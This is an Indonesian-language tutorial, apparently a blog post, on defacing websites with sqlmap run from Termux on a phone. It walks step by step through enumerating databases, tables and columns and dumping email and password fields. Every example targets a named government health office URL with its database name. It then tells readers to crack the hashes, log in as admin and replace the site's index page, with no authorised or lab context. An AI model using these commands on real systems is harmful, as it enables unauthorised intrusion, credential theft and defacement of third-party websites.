Cara Deface Sqlmap Via
Termux
Assalamualaikum.. Kali ini kita akan belajar deface website sqlmap via termux:V".. pasti kalian semua tau apa yg namanya termux.. kalaw kalian belom tau google dulu sana anjg.. manja:V".. aowkowkwoaowko gk ush bnyk cocot.. lngsng gass aja..
- Termux ( download diplaystore )
- Dork ( Cari digoogle )
- Pasang Tool Sqlmapnya dulu
$ apt update
$ apt install python
$ apt install python2
$ apt install git
$ git clone https://github.com/sqlmapproject/sqlmap
- Internet + Ketamvanan
Langkah pertama install dulu toolsna.. kalaw sudah tinggal jalanin caranya
$cd sqlmap
Kemudian baru kita inject":V".. pertama" kita perintahkan
$ python2 sqlmap.py -u (target) --dbs
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 --dbs
Kalaw sudah pasti akan muncul data basenya.. trs kita masukan perintah kedua
$ python2 sqlmap.py -u (target) -D (database) --tables
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 --tables
Disitu kita nemuin user, tinggal kita cari tau data dari user tersebut
Dri column..$ python2 sqlmap.py -u (target) -D (database) -T (NamaTable) --columns
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users --columns
klo sudah akan muncul data colum user tersebut, tinggal kita pilih email dan password atau username dan password yg akan kita cari.. kalaw gw mending satu-satu biar gk ribet..
$ python2 sqlmap.py -u (target) -D (database) -T (NamaTable) -C (namadatacolumn) --dump
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users -C email --dump
Kalaw password nya tinggal ubah aja tulisan emailnya..
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users -C password --dump
Tinggal kalian hash aja passwordnya di hashkiller.. lalu kalian cari admin loginnya.. trs kalian login dah.. kalaw mau nebas index jangan lupa backup dulu kasian adminnya:V".. okok sekian dari gw
#Thanks For Reading